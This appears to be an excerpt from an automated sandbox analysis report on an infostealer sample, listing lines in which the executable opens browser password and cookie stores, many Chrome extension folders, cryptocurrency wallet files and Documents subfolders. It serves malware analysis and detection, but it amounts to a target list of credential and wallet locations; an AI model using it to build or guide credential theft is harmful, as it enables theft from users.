            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
